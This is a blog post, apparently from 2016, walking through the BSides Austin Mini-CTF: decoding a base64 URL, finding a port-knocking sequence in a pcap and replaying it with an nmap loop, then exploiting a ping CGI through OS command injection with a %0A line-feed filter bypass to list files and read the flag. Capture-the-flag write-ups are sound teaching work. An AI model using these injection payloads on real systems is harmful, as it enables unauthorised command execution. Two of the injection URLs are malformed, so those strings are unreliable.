Web Admin Blog Real Web Admins. Real World Experience.

4Apr/160

Completing the BSides Austin 2016 Mini-CTF

The BSides Austin 2016 Mini-CTF began with the back of the badge.  There was a large QR code which took a very long time for me to scan with my phone, and when I finally got it, it was just the numbers “07263584”.  Not very useful.  Below that, however, there was  a string of letters and numbers as follows:

aHR0cDovL2N0Zi5ic2lkZXNhdXN0aW4ub3JnL2xldmVsMS8=

The string very obviously looked like BASE64 so I decoded it to get the following URL:

http://ctf.bsidesaustin.org/level1/

On that page it reads:

That start was easy! You have shown that you are curious and that is the key. As your reward, you may have this:flag 1: BSides{D3c0d3s_R_3Z}Do you want to play some more? If so, read on...

1. Turn in flags by sending an email to bsidesaustin@gmail.com. The email must contain your name, email address, and the flag you are turning in

2. There are three flags total, each should be submitted via email.

3. Do not scan this server with automated tools. They are not necessary and could cause performance issues. If you scan this server, you could be disqualified.

4. Send in flag 1 then click here to continue...

I submitted the flag and moved on to the next page at:

http://ctf.bsidesaustin.org/level2/9slfowiuwer98987987kljsdfljsdf/

On that page there was a file named coms.pcap.  With the “pcap” extension, I went ahead and loaded up into Wireshark.  It was a 1113 line packet capture file with encrypted Google traffic, YouTube rick rolls, and more.  Only a handful of the requests were for 45.32.195.232, the IP address belonging to ctf.bsidesaustin.org.  When I followed the TCP stream, it was for a request to http://ctf.bsidesaustin.org:31337/level3/index.html.  When I went to that URL, however, it was as if nothing was listening.  Eventually, I filtered the pcap by that IP as the destination and found a sequence of requests to that IP at odd ports…1025…2300…1337…1337.  This smelled suspiciously of port knocking so I wrote a quick bash script using nmap to test it out:

for x in 1025 2300 1337; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 45.32.195.232; done

Finally, I hit the page on port 31337:

http://ctf.bsidesaustin.org:31337/level3/index.html

Sure enough, now I get a response that says:

Congratulations, you have completed the second challenge!The second flag is: BSidesAustin{C4rV1NG_UP_PC4Ps}

Click here to continue to the final challenge!

I submitted the flag and moved on to the next page at:

http://ctf.bsidesaustin.org:31337/level3/owiroewuouoiu

On this page we see a network interface test where you can specify an IP as a ping destination, and when you hit “Enter”, it gives you the results of the ping:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.026 ms--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

rtt min/avg/max/mdev = 0.026/0.026/0.026/0.000 ms

Entering some non-IP address information, I got a message like:

Error running ping -c 1 127.0.0.1

So, there is some filtering on it, but it also looks like some data is making it through.  I figured out that I could specify the destination as a GET instead of the POST with by adding “?dest=127.0.0.1” to the URL and that worked.  I tried a bunch of different combinations of “;”, “&&”, and other OS command functions that would piggyback on the existing function with no luck.  Eventually, I figured out that “%0A”, the ASCII line feed control character, was not filtered and I could use that to run more commands.  For example:

http://ctf.bsidesaustin.org:31337/level3/owiroewuouoiu/index.cgi?dest=127.0.0.1%0ls

Returned a listing of “index.cgi” and “the” in that directory.  Then:

http://ctf.bsidesaustin.org:31337/level3/owiroewuouoiu/index.cgi?dest=127.0.0.1%0find

Showed that “the” actually expanded to “/the/roof/the/roof/the/roof/is/on/fire/flag.txt”.  Sweet!  I found the flag!  Now to open it.

http://ctf.bsidesaustin.org:31337/level3/owiroewuouoiu/index.cgi?dest=127.0.0.1%0Acat%3C./the/roof/the/roof/the/roof/is/on/fire/flag.txt

That returned:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.026 ms--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.026/0.026/0.026/0.000 ms
Great job! The third and final flag is:BSidesAustin{F1lt3rs_R_Fun}

Congratulations, you have completed the challenge!

Final flag submitted.  Game over!